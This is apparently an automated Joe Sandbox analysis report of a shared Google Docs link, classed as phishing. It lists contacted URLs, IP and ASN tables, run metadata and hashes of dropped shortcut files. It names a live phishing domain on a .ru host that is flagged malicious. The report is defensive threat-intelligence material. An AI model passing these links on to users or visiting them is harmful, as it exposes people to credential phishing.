                                                https://docs.google.com/static/document/client/js/2127550289-client_js_prod_kix_core.jsfalse
                                                  high
                                                  https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                    high
                                                    https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=card/exm=client,gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_2false
                                                      high
                                                      https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/trash/read?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&includes_info_params=true&usp=sharing_eip&cros_files=falsefalse
                                                        high
                                                        https://docs.google.com/static/document/client/css/3155988811-KixCss_ltr.cssfalse
                                                          high
                                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                            high
                                                            https://apis.google.com/js/api.jsfalse
                                                              high
                                                              https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/peruserchrome?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&includes_info_params=true&usp=sharing_eip&cros_files=falsefalse
                                                                high
                                                                https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/linkdetails?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&linkurl=https%3A%2F%2F2ya.leyapham.ru%2Fzdvftqs%2F&includes_info_params=true&usp=sharing_eip&cros_files=false&tab=t.0false
                                                                  high
                                                                  https://docs.google.com/static/document/client/js/2374546085-client_js_prod_kix_docos.jsfalse
                                                                    high
                                                                    https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321ffalse
                                                                      high
                                                                      https://0.docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/test?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&sid=5f1661c399f525af&includes_info_params=true&usp=sharing_eip&cros_files=false&VER=8&tab=t.0&lsq=-1&u=ANONYMOUS_06287517911256457317&flr=0&gsi&ssfi=1&ar=5&arat=MwEZMz6Tm3KrcA&smv=68&smb=%5B2147483647%2C%20oAE%3D%5D&cimpl=0&TYPE=xmlhttp&zx=xc7i7xk1hum&t=1false
                                                                        high
                                                                        https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0?le=scsfalse
                                                                          high
                                                                          https://docs.google.com/static/document/client/js/3256724347-client_js_prod_kix_nestedsketchycore.jsfalse
                                                                            high
                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                            https://signaler-staging.sandbox.google.comchromecache_248.2.drfalse
                                                                              high
                                                                              https://feedback.googleusercontent.com/resources/annotator.csschromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                high
                                                                                https://apis.google.com/js/client.jschromecache_323.2.dr, chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                  high
                                                                                  https://support.google.comchromecache_323.2.dr, chromecache_416.2.dr, chromecache_431.2.drfalse
                                                                                    high
                                                                                    http://localhost.proxy.googlers.com/inapp/chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://support.google.com/docs?p=gemini_docs_summaryblockchromecache_248.2.drfalse
                                                                                      high
                                                                                      https://support.google.com/a/?p=disable_docs#topic=4388346chromecache_323.2.drfalse
                                                                                        high
                                                                                        https://today.meet.google.comchromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                          high
                                                                                          https://drive.sandbox.google.comchromecache_323.2.drfalse
                                                                                            high
                                                                                            https://support.google.com/docs/answer/7505592chromecache_323.2.drfalse
                                                                                              high
                                                                                              https://support.google.com/docs/answer/14925782chromecache_248.2.drfalse
                                                                                                high
                                                                                                https://mail.google.comchromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                                  high
                                                                                                  https://support.mozilla.org/en-US/kb/disable-or-remove-add-onschromecache_323.2.drfalse
                                                                                                    high
                                                                                                    https://support.google.com/drive/?hl=enchromecache_248.2.drfalse
                                                                                                      high
                                                                                                      https://pay.google.com/gp/v/widget/savechromecache_330.2.drfalse
                                                                                                        high
                                                                                                        https://calendar.google.com/calendar/r/day/chromecache_323.2.drfalse
                                                                                                          high
                                                                                                          https://support.google.com/chat/#topic=7649317chromecache_248.2.drfalse
                                                                                                            high
                                                                                                            https://drive-thirdparty.googleusercontent.com/chromecache_323.2.drfalse
                                                                                                              high
                                                                                                              https://chat.google.com/room/chromecache_248.2.drfalse
                                                                                                                high
                                                                                                                https://content-googleapis-test.sandbox.google.comchromecache_323.2.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.google.com/drive/chromecache_248.2.drfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/shopping/customerreviews/optin?usegapi=1chromecache_330.2.drfalse
                                                                                                                    high
                                                                                                                    https://asx-frontend-autopush.corp.google.co.uk/tools/feedback/chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://developers.google.com/chromecache_375.2.dr, chromecache_395.2.drfalse
                                                                                                                      high
                                                                                                                      https://support.google.com/docs?p=add_encryptionchromecache_323.2.drfalse
                                                                                                                        high
                                                                                                                        https://support.google.com/mapschromecache_248.2.drfalse
                                                                                                                          high
                                                                                                                          https://developers.google.com/identity/gsi/web/guides/gis-migration)chromecache_375.2.dr, chromecache_395.2.drfalse
                                                                                                                            high
                                                                                                                            https://policies.google.com/terms?hl=enchromecache_248.2.drfalse
                                                                                                                              high
                                                                                                                              https://www.google.com/tools/feedbackchromecache_323.2.dr, chromecache_359.2.dr, chromecache_361.2.dr, chromecache_255.2.dr, chromecache_374.2.drfalse
                                                                                                                                high
                                                                                                                                https://support.google.com/help_center?p=gemini_cover_imagechromecache_248.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://support.google.com/contactschromecache_248.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://sandbox.google.com/inapp/%chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://tasks.google.com/chromecache_248.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://play.google.com/store/apps/details?id=com.google.android.apps.docs.editors.docs&referrer=utmchromecache_248.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://cdnjs.cloudflare.com/ajax/libs/mathjax/chromecache_443.2.dr, chromecache_287.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://docs.google.com/pickerchromecache_323.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://support.google.com/chrome/answer/187443chromecache_323.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.google.com/tools/feedback/chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.youtube.com/subscribe_embed?usegapi=1chromecache_330.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://punctual-dev.corp.google.comchromecache_248.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://support.google.com/docs?p=labs-privacychromecache_248.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://support.google.com/docs?p=labs-privacychromecache_248.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://plus.google.comchromecache_351.2.dr, chromecache_340.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://asx-frontend-autopush.corp.google.de/tools/feedback/chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://docs.google.com/document/d/1SzAxs6HDSH1zNGEVCmGwZQR1cxdQI8-33mpYgl6Q1jE/r/0-5tmxJv1j5g5hY7dgchromecache_248.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://support.google.com/a/users/answer/10992111chromecache_248.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://workspaceui-pa.clients6.google.comchromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://asx-frontend-autopush.corp.google.com/inapp/chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://feedback.googleusercontent.com/resources/render_frame2.htmlchromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://content-googleapis-staging.sandbox.google.comchromecache_323.2.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://play.google.com/work/embedded/search?usegapi=1&usegapi=1chromecache_330.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://policies.google.com/privacychromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://support.google.com/docs/answer/190843#compare_documentschromecache_248.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://support.google.com/docs?p=help-me-visualizechromecache_248.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://support.google.com/docs?p=labs_docs_summaryblockchromecache_248.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://support.google.com/drive/?p=drive_onlychromecache_323.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://drive.google.com/drive/my-drivechromecache_248.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://support.google.com/a/answer/9275380chromecache_248.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://support.google.com/docs/answer/13447609chromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.google.com/maps/aboutchromecache_248.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://support.google.com/docs?p=vids_image_generation_labschromecache_248.2.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://support.google.com/drive/answer/37603chromecache_248.2.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.google.com/calendar/event?eid=YmxuY2w5M2JlcG1obmpqOWNxbHFsMjBxZ2lfMjAyMTA1MjVUMTcwMDAwWichromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://play.google.comchromecache_323.2.dr, chromecache_416.2.dr, chromecache_431.2.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://support.google.com/docs/answer/10519333#zippy=chromecache_248.2.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.google.com/log?format=json&hasfast=truechromecache_381.2.dr, chromecache_246.2.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://signaler-pa.youtube.comchromecache_248.2.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://support.google.com/inapp/%chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://support.google.com/drive/?hl=en&p=anonymous_userschromecache_323.2.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://calendar.google.com/calendar/:authuser/companionchromecache_248.2.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://support.google.com/docs?p=GSM_migrationchromecache_248.2.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://angular.dev/licensechromecache_323.2.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://support.google.com/help_center?p=insert_cover_imagechromecache_248.2.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.google.com/keep/chromecache_248.2.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://support.google.com/docs?p=gemini-help-me-visualizechromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.google.com/shopping/customerreviews/badge?usegapi=1chromecache_330.2.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://support.google.com/taskschromecache_248.2.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://meet.google.comchromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://support.google.com/docs/?p=chromecache_248.2.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://drive.google.com/savetodrivebutton?usegapi=1chromecache_330.2.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://support.google.com/docs/answer/190843chromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://support.google.com/inapp/chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://asx-frontend-autopush.corp.google.co.uk/inapp/chromecache_359.2.dr, chromecache_374.2.drfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://one.google.com/planschromecache_248.2.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://inputtools.google.comchromecache_248.2.dr, chromecache_306.2.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        142.250.185.206
                                                                                                                                                                                                                                        docs.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        104.21.20.57
                                                                                                                                                                                                                                        3iff5.biijvi.ruUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        216.58.206.78
                                                                                                                                                                                                                                        plus.l.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        104.18.94.41
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        151.101.130.137
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                        104.16.6.189
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        142.250.184.228
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        104.16.2.189
                                                                                                                                                                                                                                        developers.cloudflare.comUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        104.17.24.14
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        142.250.186.78
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        108.177.15.189
                                                                                                                                                                                                                                        browserchannel-sites.l.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        172.217.18.4
                                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        104.18.95.41
                                                                                                                                                                                                                                        challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        216.58.206.46
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        151.101.2.137
                                                                                                                                                                                                                                        code.jquery.comUnited States
                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                                        188.114.96.3
                                                                                                                                                                                                                                        2ya.leyapham.ruEuropean Union
                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                        172.217.16.196
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        104.17.25.14
                                                                                                                                                                                                                                        cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        192.168.2.5
                                                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                        Analysis ID:1630025
                                                                                                                                                                                                                                        Start date and time:2025-03-05 12:46:27 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 3m 47s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                        Sample URL:https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal68.phis.win@18/392@54/20
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.185.99, 142.250.186.174, 64.233.184.84, 172.217.16.206, 142.250.186.46, 142.250.185.131, 142.250.185.227, 172.217.16.195, 142.250.185.202, 142.250.186.138, 142.250.186.106, 216.58.212.138, 172.217.23.106, 142.250.184.234, 142.250.185.74, 142.250.185.106, 172.217.16.138, 142.250.185.138, 142.250.185.234, 142.250.186.42, 142.250.186.170, 142.250.184.202, 142.250.186.74, 172.217.18.10, 172.217.18.3, 172.217.18.106, 142.250.181.234, 199.232.214.172, 184.30.131.245, 216.58.206.74, 216.58.206.42, 172.217.16.202, 216.58.212.170, 216.58.212.174, 142.250.181.238, 142.250.184.227, 34.104.35.123, 2.16.164.72, 172.217.18.14, 142.250.184.206, 142.250.184.238, 23.199.214.10, 20.12.23.50, 13.107.253.72
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): clients1.google.com, ssl.gstatic.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, fonts.gstatic.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        • VT rate limit hit for: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f
                                                                                                                                                                                                                                        No simulations
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 10:47:20 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                                        Entropy (8bit):3.9835960221594715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8cdXTPvL5+HEidAKZdA19ehwiZUklqeh1y+3:8ozbmy
                                                                                                                                                                                                                                        MD5:B8C598A4BE4820631C83A42113ADA556
                                                                                                                                                                                                                                        SHA1:1900299FF01A5FA61E4C2F9CA56301A56DD0EAA5
                                                                                                                                                                                                                                        SHA-256:A6E0C8C9D583C454D34F11EFDA12DD9BC3E7E7A84EBF80DA21E03C541712DB53
                                                                                                                                                                                                                                        SHA-512:C32FD88366D2FDB982F315CCDC61EDA955C7645A8258AE3F57F67414D45A14D1EC46FD2AB6B11C5D76DEF637CFBABFAD452E41A725AB4E72859F72B1A7D123DF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......{Z...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeZ.]....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.]....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.]....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.]..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.]...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........O........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 10:47:20 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                                        Entropy (8bit):3.9977262556208966
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8GdXTPvL5+HEidAKZdA1weh/iZUkAQkqehWy+2:8mzp9QLy
                                                                                                                                                                                                                                        MD5:15530861EFD86961EC3C6D108F04BFB1
                                                                                                                                                                                                                                        SHA1:F7AE02A01FAE8098FD2D40BAD5FD629D905A36A6
                                                                                                                                                                                                                                        SHA-256:FCAF9A1EFB751AC08836A14322514C5BBADB6B77FBFC6501CC3869BA0A5365EA
                                                                                                                                                                                                                                        SHA-512:A3738F388B8A41ECE5A2EAB95639978C407412864EEE0FC110FC6EB838E956A67AA3E4C7EAC20B325E1AB4F39541D887836CC5EE03089BD76F12DE7AFD237DD4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......PZ...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeZ.]....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.]....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.]....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.]..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.]...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........O........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                                                        Entropy (8bit):4.008259541666923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8xAdXTPvsHEidAKZdA14tseh7sFiZUkmgqeh7sEy+BX:8xMzZnqy
                                                                                                                                                                                                                                        MD5:1D275D5A60F2475040B19715CFCD1189
                                                                                                                                                                                                                                        SHA1:4E6A35DA80F35ED4AED3FD298A507D60F524DABF
                                                                                                                                                                                                                                        SHA-256:7C2B050798CECD2C8301C956B53BEBF4716F2C084A11DA270892800733C5E155
                                                                                                                                                                                                                                        SHA-512:052038AED3D4F41A009349A009E6D21F667099A6D4338D82464C071F1C6B650F58315FF574565D88305D20176830065C8A290200E913E80A38D7CB19AB438647
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeZ.]....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.]....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.]....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.]..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........O........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 10:47:20 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                        Entropy (8bit):3.995634529972753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8GdXTPvL5+HEidAKZdA1vehDiZUkwqehCy+R:8mzq8y
                                                                                                                                                                                                                                        MD5:E963BA8D7640170509EDDCCE53BDE6D0
                                                                                                                                                                                                                                        SHA1:A37979C4BDCE418F6F07DDF269B80D82D0FFEB9D
